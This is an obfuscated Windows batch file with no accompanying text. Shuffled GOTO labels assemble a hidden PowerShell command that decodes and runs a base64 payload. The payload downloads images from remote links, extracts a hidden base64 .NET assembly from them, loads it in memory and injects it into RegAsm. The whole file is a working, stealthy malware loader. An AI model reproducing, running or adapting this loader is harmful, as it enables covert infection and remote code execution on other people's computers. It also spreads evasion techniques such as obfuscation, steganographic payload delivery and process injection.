@echo off
GOTO DOGNNIUGSO
:KDGGJNGIGD
SET JGOOOOOODN=BjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbw
GOTO IOGFGDDDJG
:IHOJIDIDON
SET HNDFOKHGFI=YgBsAGUAIABOAGEAbQBlACwAQwBQAFUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA
GOTO IOGFGDDDJG9
:OODGSJFGSG
SET NUIUFFOOHJ=GcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAo
GOTO DDFINGJJOI
:KDGGJNGIGD8
SET DKSDJJGSNI=AAgAFMAbwByAHQALQBPAGIAagBlAGMAdAAgAEMAUABVACAALQBEAGUAcwBjAGUAbgB
GOTO KDGGJNGIGD9
:OGIOGNJNHO
SET NJFNDDDNDK=vAGQAKAAnAHIAdQBuAHMAJwAgACsAIAAnAHMAJwApAC4ASQBuAHYAbwBf#AGUAKAA
GOTO UUNJDGGGGN
:GOSGIDNNOD
SET FGFIIHFOGG=VwBlAGIAQwBsAGkAZQBuAHQAOwAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAA
GOTO FNJODNGJGG5
:DKJHIOGONJ
SET GGOUGISISD=AHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgAA0ACgAgA
GOTO SFGIJGGSHJ
:FHSISOGIGI
SET ISGDSINONG=cAcQBBAGMATgAnACkAKQA7ACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAA
GOTO IDDHJJNOIO
:GOGDNFNOOJ
SET IINODDFJGJ=bABpAG4AawBzACAALQBDAG8AdQBuAHQAIAAkAGwAaQBuAGsAcwAuAEwAZQBuAGcAdABoADsA
GOTO FNJODNGJGG8
:KDGGJNGIGD1
SET DOFIINNNGF=nAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAIAAgACQAZ
GOTO KDGGJNGIGD2
:OIGDJGGIOI
SET IDFNJDHINI=BlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQA
GOTO IDODGKGSFI
:FHFHIFIGJJ
SET NKKHIJGGND=ABpAGYAIAAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAC0AbgBlACAAJABuAHUAbA
GOTO OGNGDGODNG
:GOHOOGIJIF
SET JJDODNGODF=m.convert]::Frombase64string([regex]::Replace($ddsdgo, ''f#'', 
GOTO GOHOSUSFIN0
:UJGIFOGINI
SET ONUIIGGJGN=jAGgAIAAoACQAbABpAG4AawAgAGkAbgAgACQAcwBoAHUAZgBmAGwAZQBkAEw
GOTO GFIGIUNIJJ0
:SDHIGDHGDF
SET DDNFINJGFJ=LAAgACQAaQBuAGoAZQBjACwAIAAnADAAJwAgACwAIAAnAHgANgA0ACcAKQApAH0AfQA='';
GOTO GFGDDKSNGF
:DSFGSJIDNJ
SET NUGDGGGIDG=CgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI
GOTO FHFHIFIGJJ
:OIOUJDNOGI
SET SKOOGJIGDO=4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABl
GOTO DKJHIOGONJ
:HJOGNOODGF
SET DJNGGOINDG=AAIAAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQB
GOTO DDNNNIGNSG6
:FDONDOHNND
SET NNNGGNNJFG=BhADcANwAtADQANgBkADIALQA5ADcANQBjAC0AYgBjADQAMwA5ADQAYwBlADcAMgAxADcAJwApACw
GOTO GFFKGGNDON
:JOSJJIJGJO
SET GFGHOISFGF=kAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAO
GOTO DDNNNIGNSG1
:UUNJDGGGGN
SET HDDIDIFDFN=kAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBkA
GOTO IIGODOGFSI
:IFIGGKDSGO
SET OGGDGIODIO=IAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHI
GOTO JOGDIDGDGI
:DGOIODIFDD
SET HOIFHNNJIJ=AAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9A
GOTO OGDFGDONIG
:DOGNNIUGSO
SET NGUNNDOHOG=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Command
GOTO FNJODNGJGG
:GGDIOIIFFG
SET DDGOINOSUI=AgACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAcABlAC4ARwBlAHQATQBlAHQAaAB
GOTO OGIOGNJNHO
:GOHOSUSFIN
SET FDUDDUJGIJ=EAZABEAGEAdABhAEYAcgBvAG0ATABpAG4AawBzACAAewAgAHAAYQByAGEAbQAgACgAWwBzA
GOTO FNJODNGJGG1
:FNJODNGJGG
SET GDNOIIOIIJ= "Start-Process %SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe 
GOTO GFIGIUNIJJ
:IFHIINGFGG
SET GOUGGNJFIN=AbABpAG4AawBzACAAPQAgAEAAKAAoACQAbABmAHMAZABmAHMAZABnACAAKwAgACcAZgBpAHIAZQ
GOTO IFIJIIGDJF1
:DJSDDDGGOD
SET OKHHODONOG=BCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0Ab
GOTO KDGGJNGIGD0
:JFDDIGOGUG
SET OGNFFOGFJH=AKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHQ
GOTO GNIJSJFGHU
:FFGJDIOFDO
SET DFNGDOISID=YgB1AGgAdABpAGcALgB3AGEAcgAvAC8AOgBzACcALAAgACcAMAAnACwAIAAnACcA
GOTO SDHIGDHGDF
:OGDFGDONIG
SET DIIGFOONOO=CAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQ
GOTO DJSDDDGGOD
:DDGIIOSJGF
SET NFDFOJJONF=PQAgACcAPAA8AEIAQQAnACAAKwAgACcAUwBFACcAIAAf#ACAAJwA2ADQAXwBTAFQAQQBSAFQAPg
GOTO KGDNGNSOJJ9
:IHDIKFINSG
SET OGGDGGDGIJ=YgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGkAbgBf#ACkAIAB9AC
GOTO GFIGIUNIJJ2
:IIGODOGFSI
SET GNOOSDOGNN=HIAZQBuAC8AbgBpAGEAbQAvAHMAZABhAGUAaAAvAHMAZgBlAHIALwA3ADMAMwAxA
GOTO IFDNIUSGJK
:JSFUOGGGOI
SET DOGGNFUIFI=wAuAEwAZQBuAGcAdABoADsAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACA
GOTO OJIOGOOGJD
:KDGGJNGIGD2
SET NHDFJSIDDH=QBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4
GOTO KDGGJNGIGD3
:DDFINGJJOI
SET DFSDNGGJIF=ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAE
GOTO DSIJDDHGON
:GGJJINIDSF
SET SGFNNONDOI=AHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBf#AHMAIAAkAGwAaQBuAGsAcwA7AA0A
GOTO DSFGSJIDNJ
:GFFKGGNDON
SET SGIJJGGDSN=AKAAkAGwAZgBzAGQAZgBzAGQAZwAgACsAIAAnAGEAdQA3ADIAbgB1AHgAegB2ADIALgB1AGYAcwAu
GOTO DFNGDGODFG
:IDODGKGSFI
SET DNOJFONDJG=LgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEA
GOTO DDNNNIGNSG4
:GFIGIUNIJJ
SET FFKSNIOKDD=-WindowStyle Hidden -ArgumentList '-Command \"$ddsdgo = ''DQA
GOTO IFIJIIGDJF
:GFIGIUNIJJ8
SET IIJOOIIJUI=ZABmAHMAZABnACAAPQAgACAAJABCAHkAdABlAHMAIAAf#ACQAQgB5AHQAZQBzA
GOTO GFIGIUNIJJ9
:NOIOIOOGII
SET GFSFDIKFOK=ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhA
GOTO OODGSJFGSG
:NDNJDJGGJF
SET SSDUODIJGN=AZQBjAHQAIAAtAEYAaQByAHMAdAAgADUAIAB8ACAARgBvAHIAbQBhAHQALQBUAGEA
GOTO IHOJIDIDON
:JOIDNOGGGN
SET SOIDSFUNFJ=ACgAJwBtAHkAcAByAG8AZwByAGEAbQAuAEgAbwBtAGUAZQBzACcAKQA7AA0ACgANAAoA
GOTO IFIGGKDSGO
:KDGGJNGIGD3
SET NFUDHGFDIJ=AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwANAAoAIAAgACAAIAAgACAA
GOTO KDGGJNGIGD4
:FNJODNGJGG2
SET GFNGGIGFHN=AAIAAgACAAIAAgACAAIAAgACAAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQA
GOTO FNJODNGJGG3
:UOGDIIIGFG
SET HJKDFGOKFD=CAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGo
GOTO NDNJDJGGJF
:GONFNDGGSO
SET FFHFUNOSUU=tACcAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA
GOTO GGDIOIIFFG
:KDGGJNGIGD7
SET FDOOFGDDID=gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAf
GOTO KDGGJNGIGD8
:DFNGDGODFG
SET GINFJFFGDU=AHMAaAAvAGYALwA0AEwAaABWADUAQgAxAHMARABDAHcASQBIAGYAQgBNAGEAdgBpAG0A
GOTO IFIJIIGDJF8
:GFIGIUNIJJ2
SET FKSODSGGSG=AAYwBhAHQAYwBoACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0AIAB9ADsAIAANAAoAIAAgACAAI
GOTO GFIGIUNIJJ3
:SFGIJGGSHJ
SET FOKOKIFDIG=CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABlAG4AZABJAG4AZABlAHgAIAA9
GOTO NOIOIOOGII
:GNIJSJFGHU
SET JJDDNFIDIJ=AeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABl
GOTO JOIDNOGGGN
:GFIGIUNIJJ7
SET FSUGIUHNSF=A7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbABmAHMA
GOTO GFIGIUNIJJ8
:DOFSJGNGOG
SET IDHSGDISOF=AAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHMAdABhAHIAdABGAGwAYQBnACAA
GOTO DDGIIOSJGF
:FNJODNGJGG5
SET FSOJFGIDDJ=gACAAIAAgACAAIAAgACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACAAPQA
GOTO FNJODNGJGG6
:GFIGIUNIJJ6
SET DIDODINDNN=ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABCAHkAdABlAHMAMgAgAD0AIAAnAHMAOgAvAC8AJw
GOTO GFIGIUNIJJ7
:GFGDDKSNGF
SET FSDSFJNOIO=$oWjfdsuxd = [system.Text.encoding]::Unicode.GetString([syste
GOTO GOHOOGIJIF
:GFIGIUNIJJ4
SET IFGSINGDDD=UAbABsACAAfQA7ACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI
GOTO GFIGIUNIJJ5
:DDNNNIGNSG
SET FGGNUSFSFF=ABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbw
GOTO KDGGJNGIGD
:FNJODNGJGG8
SET DNDDJNDJGO=IAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGYAbwByAGUAYQB
GOTO UJGIFOGINI
:DDNNNIGNSG4
SET OUFONOOINF=cwBlADYANABMAGUAbgBnAHQAaABoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC
GOTO HJOGNOODGF
:GIGFJISNDF
SET IDNOIGGDKN=dAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAa
GOTO KGDNGNSOJJ6
:IDDHJJNOIO
SET DJIGKSOOSJ=gACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAARABv
GOTO GGJJINIDSF
:GOHOSUSFIN0
SET GGNGJJINJS=''r'')));iex $oWjfdsuxd\"'"
GOTO GOHOSUSFIN1
:IFIJIIGDJF
SET HDFGINNNDJ=KACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAG
GOTO KGDNGNSOJJ
:KDGGJNGIGD9
SET DGDGFNINIJ=kAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQB
GOTO IOGFGDDDJG0
:DDNNNIGNSG1
SET KHGOOIOIDN=wANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGEAcw
GOTO OIGDJGGIOI
:GFIGIUNIJJ0
SET GGKGINJIOO=AaQBuAGsAcwApACAAewAgAHQAcgB5ACAAewAgAHIAZQB0AHUAcgBuACAAJAB3AGUA
GOTO IHDIKFINSG
:FNJODNGJGG1
SET SONODGGIOI=HQAcgBpAG4AZwBbAF0AXQAkAGwAaQBuAGsAcwApACAADQAKACAAIAAgACAAIAAgACAAIAAgAC
GOTO FNJODNGJGG2
:OJIOGOOGJD
SET UDGDDHOFOH=AIAAgACAAIAAgACAAIAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAaAAgAD0AIAA
GOTO JOSJJIJGJO
:JOGDIDGDGI
SET FNHFOSJJJI=AbwBjAGUAcwBzACAAfAAgAFMAbwByAHQALQBPAGIAagBlAGMAdAAgAEMAUABVA
GOTO UOGDIIIGFG
:IFIJIIGDJF4
SET FNONIJIDJO=AD0AbQBlAGQAaQBhACYAdABvAGsAZQBuAD0ANgBlAGMAZAA2AGYAMgA1AC0ANg
GOTO FDONDOHNND
:GFIGIUNIJJ9
SET FDSDGOHJOI=DIAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQ
GOTO IFHIINGFGG
:GOHOSUSFIN2
%NGUNNDOHOG%%GDNOIIOIIJ%%FFKSNIOKDD%%HDFGINNNDJ%%SIJDFSOGON%%GGIGOIOJIG%%FGGNUSFSFF%%JGOOOOOODN%%OOIOGIIUNG%%IKIGSGKGGI%%FDUDDUJGIJ%%SONODGGIOI%%GFNGGIGFHN%%FNGIGDSIOO%%FGFIIHFOGG%%FSOJFGIDDJ%%GOODGOGGHG%%IINODDFJGJ%%DNDDJNDJGO%%ONUIIGGJGN%%GGKGINJIOO%%OGGDGGDGIJ%%FKSODSGGSG%%KGHGHJFNDH%%IFGSINGDDD%%SSFUDFFUDO%%DIDODINDNN%%FSUGIUHNSF%%IIJOOIIJUI%%FDSDGOHJOI%%GOUGGNJFIN%%GIJFFGNDGJ%%GNODJNNJIN%%NDOUIOIDOG%%FNONIJIDJO%%NNNGGNNJFG%%SGIJJGGDSN%%GINFJFFGDU%%UNOJGNFHKI%%ISGDSINONG%%DJIGKSOOSJ%%SGFNNONDOI%%NUGDGGGIDG%%NKKHIJGGND%%UDFNONDFDF%%IDNOIGGDKN%%GKNGOJIIDJ%%IDHSGDISOF%%NFDFOJJONF%%HNDIGOGIGN%%SKOOGJIGDO%%GGOUGISISD%%FOKOKIFDIG%%GFSFDIKFOK%%NUIUFFOOHJ%%DFSDNGGJIF%%NDDNDDIFGG%%SDDDOOIIDO%%DOGGNFUIFI%%UDGDDHOFOH%%GFGHOISFGF%%KHGOOIOIDN%%IDFNJDHINI%%DNOJFONDJG%%OUFONOOINF%%DJNGGOINDG%%FKIDDINFDG%%HOIFHNNJIJ%%DIIGFOONOO%%OKHHODONOG%%SNDINGIGJD%%DOFIINNNGF%%NHDFJSIDDH%%NFUDHGFDIJ%%JHDJONOKID%%GDSUIFDJGD%%DDGGFDGJDD%%FDOOFGDDID%%DKSDJJGSNI%%DGDGFNINIJ%%GHIUGFNNJG%%OGNFFOGFJH%%JJDDNFIDIJ%%SOIDSFUNFJ%%OGGDGIODIO%%FNHFOSJJJI%%HJKDFGOKFD%%SSDUODIJGN%%HNDFOKHGFI%%IDGDKNNSIG%%FFHFUNOSUU%%DDGOINOSUI%%NJFNDDDNDK%%HDDIDIFDFN%%GNOOSDOGNN%%GGKFOGGOOD%%DFNGDOISID%%DDNFINJGFJ%%FSDSFJNOIO%%JJDODNGODF%%GGNGJJINJS%
GOTO GOHOSUSFIN3
:IOGFGDDDJG
SET OOIOGIIUNG=BjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI
GOTO JHSJSFIDSO
:IFIJIIGDJF8
SET UNOJGNFHKI=VgAxAHcAWQBMAEQAcwAzADcAcABCADkAMABJAG4AUgBKAGwAVABqAEcAeQBLAF
GOTO FHSISOGIGI
:DSIJDDHGON
SET NDDNDDIFGG=kAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAIAB7
GOTO UDUGOUSNDF
:GFIGIUNIJJ5
SET SSFUDFFUDO=AAkAEIAeQB0AGUAcwAgAD0AIAAnAGgAdAB0AHAAJwA7AA0ACgAgACAAIAAgACAAIAAg
GOTO GFIGIUNIJJ6
:UDUGOUSNDF
SET SDDDOOIIDO=ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZ
GOTO JSFUOGGGOI
:KDGGJNGIGD4
SET JHDJONOKID=IAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACA
GOTO KDGGJNGIGD5
:IFDNIUSGJK
SET GGKFOGGOOD=C8AOAAyADcANAA2ADIAMwA4ADIAMwAxAC8AbQBvAGMALgB0AG4AZQB0AG4AbwBjAHIAZQBzAHUA
GOTO FFGJDIOFDO
:KDGGJNGIGD6
SET DDGGFDGJDD=F0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwANAAoAIAAgACAAIAA
GOTO KDGGJNGIGD7
:FNJODNGJGG6
SET GOODGOGGHG=gAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQA
GOTO GOGDNFNOOJ
:JHSJSFIDSO
SET IKIGSGKGGI=AAgACAAIAAgACAAIAAgAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AbABvAG
GOTO GOHOSUSFIN
:KDGGJNGIGD5
SET GDSUIFDJGD=APQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5A
GOTO KDGGJNGIGD6
:IFIJIIGDJF3
SET NDOUIOIDOG=GEAZwBlAC4AYQBwAHAALwBvAC8AZgBvAHIAcwB0ACUAMgBGAHAAaQBjADgALgBqAHAAZwA/AGEAbAB0
GOTO IFIJIIGDJF4
:IFIJIIGDJF2
SET GNODJNNJIN=LwBiAC8AaABvAGwAZAAtADgAZgBhAGQANQAuAGYAaQByAGUAYgBhAHMAZQBzAHQAbwByA
GOTO IFIJIIGDJF3
:IOGFGDDDJG0
SET GHIUGFNNJG=yAHMAdAAgADUAIAB8ACAARgBvAHIAbQBhAHQALQBUAGEAYgBsAGUAIABOAGEAbQBlACwAQwBQAFUADQ
GOTO JFDDIGOGUG
:GFIGIUNIJJ3
SET KGHGHJFNDH=AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABuAH
GOTO GFIGIUNIJJ4
:OGNGDGODNG
SET UDFNONDFDF=BsACkAIAB7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgA
GOTO GIGFJISNDF
:IOGFGDDDJG9
SET IDGDKNNSIG=AIAAgACAAIAAgACAAIAAkAGkAbgBqAGUAYwA9ACcAUgBlAGcAJwAgACsAIAAnAEEAcwB
GOTO GONFNDGGSO
:GOHOSUSFIN1
                      
GOTO GOHOSUSFIN2
:DDNNNIGNSG6
SET FKIDDINFDG=uAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsADQAKACAAIAAgACAAIAAgAC
GOTO DGOIODIFDD
:KGDNGNSOJJ
SET SIJDFSOGON=wAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzAA0ACgAgACAAIAAgACAAIAAgACAAIA
GOTO FONFIJFIDI
:KGDNGNSOJJ6
SET GKNGOJIIDJ=QBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AA0ACgAgACAAIAAgAC
GOTO DOFSJGNGOG
:IFIJIIGDJF1
SET GIJFFGNDGJ=BiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAA
GOTO IFIJIIGDJF2
:KGDNGNSOJJ9
SET HNDIGOGIGN=A+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD
GOTO OIOUJDNOGI
:FNJODNGJGG3
SET FNGIGDSIOO=gAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4A
GOTO GOSGIDNNOD
:FONFIJFIDI
SET GGIGOIOJIG=AgACAAIAAgACAAIAAgACAAIAAgACAAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAU
GOTO DDNNNIGNSG
:KDGGJNGIGD0
SET SNDINGIGJD=QBhAG4AZAApADsAIAAgACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQB
GOTO KDGGJNGIGD1
:GOHOSUSFIN3
